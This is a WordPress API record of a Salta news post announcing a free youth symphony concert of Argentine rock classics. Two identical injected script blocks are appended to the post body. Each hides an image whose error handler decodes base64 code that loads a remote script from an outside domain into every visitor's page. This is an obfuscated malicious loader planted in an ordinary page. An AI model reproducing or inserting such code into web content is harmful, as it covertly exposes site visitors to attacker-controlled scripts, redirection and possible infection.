{"id":3971,"date":"2024-05-08T08:44:35","date_gmt":"2024-05-08T11:44:35","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=3971"},"modified":"2025-08-13T23:56:26","modified_gmt":"2025-08-14T02:56:26","slug":"rock-nacional-sinfonico-en-el-teatro-provincial-juan-carlos-saravia","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=3971","title":{"rendered":"Rock Nacional Sinf\u00f3nico en el Teatro Provincial Juan Carlos Saravia"},"content":{"rendered":"\n<h4 class=\"wp-block-heading has-white-color has-text-color has-background has-link-color wp-elements-f23e42c310d7a11d43c199a8b953132e\" style=\"background-color:#85044b\"><em>Hoy mi\u00e9rcoles 8 de mayo a las 20:30, la Orquesta Sinf\u00f3nica Infantil y Juvenil se presentar\u00e1 en el Teatro Provincial Juan Carlos Saravia con un importante repertorio cl\u00e1sico de rock nacional. Actividad con entrada libre y gratuita.<\/em><\/h4>\n\n\n\n<p>La Orquesta Sinf\u00f3nica Infantil y Juvenil de la Provincia presentar\u00e1 un repertorio de Rock Nacional en el Teatro Provincial hoy\u00a0mi\u00e9rcoles 8 de mayo a las 20:30hs. Durante la velada, la Orquesta Sinf\u00f3nica Infantil se presentar\u00e1 bajo la batuta de la directora de la instituci\u00f3n, Mtra. Carolina Pineda. Asimismo, la Orquesta Sinf\u00f3nica Juvenil por su parte, har\u00e1 lo propio bajo la direcci\u00f3n del Mtro. Mart\u00edn D\u2019El\u00eda.<\/p>\n\n\n\n<p>El Coro Juvenil, tambi\u00e9n parte de la instituci\u00f3n, se presentar\u00e1 dirigido por Cecilia Cafrune; y la participaci\u00f3n del Coro Cantares como invitado, se realizar\u00e1 bajo la direcci\u00f3n de Bernardita Sarmiento, quien se unir\u00e1 a esta sinfon\u00eda rockera, enriqueciendo la experiencia auditiva.<\/p>\n\n\n\n<p>Finalmente, se prev\u00e9 la participaci\u00f3n de la banda de rock \u00abQuimera\u00bb, compuesta por alumnos y ex alumnos de la OSIJS, quienes est\u00e1n compartiendo su camino en el mundo de la m\u00fasica profesional con su talento y pasi\u00f3n.<\/p>\n\n\n\n<p>Este evento cultural imperdible ofrece una oportunidad \u00fanica para disfrutar de los cl\u00e1sicos del Rock Argentino de todos los tiempos, atendiendo la fusi\u00f3n de g\u00e9neros musicales y el talento emergente de nuestros estudiantes y artistas locales. Actividad con entrada libre y gratuita.<\/p>\n\n\n\n<p>Para m\u00e1s informaci\u00f3n sobre el evento y c\u00f3mo asegurar tu lugar, visita&nbsp;www.culturasalta.gov.ar&nbsp;y prep\u00e1rate para vivir una experiencia musical inolvidable en el Teatro Provincial Juan Carlos Saravia.<\/p>\n\n\n\n<figure class=\"wp-block-image\"><a href=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/11959-orquesta-infantil.png\"><img decoding=\"async\" src=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/11959-orquesta-infantil.png\" alt=\"Orquesta infantil\"\/><\/a><\/figure>\n\n\n\n<p><strong>Sobre la Orquesta Infantil y Juvenil de la Provincia<\/strong><\/p>\n\n\n\n<p>La Orquesta Infantil y Juvenil de la Provincia de Salta (OSIJS) es un organismo perteneciente al Instituto de M\u00fasica y Danza (IMD), que a su vez est\u00e1 bajo la \u00f3rbita del Ministerio de Cultura, Educaci\u00f3n, Ciencia y Tecnolog\u00eda de la Provincia de Salta, Argentina.<\/p>\n\n\n\n<div class=\"wp-block-buttons is-layout-flex wp-block-buttons-is-layout-flex\">\n<div class=\"wp-block-button\"><a class=\"wp-block-button__link wp-element-button\" href=\"https:\/\/docs.google.com\/forms\/d\/e\/1FAIpQLScvdlE_ThGVA8joohQDh_WWzvtaO2bA_7dURcisNkGGuQqezA\/viewform\">Aqu\u00ed Formulario Inscripci\u00f3n<\/a><\/div>\n<\/div>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<p>Fuente:\u00a0<strong><a href=\"https:\/\/www.salta.gob.ar\/prensa\/noticias\/rock-nacional-sinfonico-en-el-teatro-provincial-juan-carlos-saravia-95461\" target=\"_blank\" rel=\"noopener\" title=\"\">Secretar\u00eda de Prensa y Comunicaci\u00f3n<\/a><\/strong><\/p>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>Hoy mi\u00e9rcoles 8 de mayo a las 20:30, la Orquesta Sinf\u00f3nica Infantil y Juvenil se presentar\u00e1 en el Teatro Provincial Juan Carlos Saravia con un importante repertorio cl\u00e1sico de rock nacional. Actividad con entrada libre y gratuita. La Orquesta Sinf\u00f3nica Infantil y Juvenil de la Provincia presentar\u00e1 un repertorio de Rock Nacional en el Teatro [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":3972,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[14,13],"tags":[],"class_list":{"0":"post-3971","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-anuncios","8":"category-festivales"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/3971"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=3971"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/3971\/revisions"}],"predecessor-version":[{"id":6793,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/3971\/revisions\/6793"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/3972"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=3971"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=3971"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=3971"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}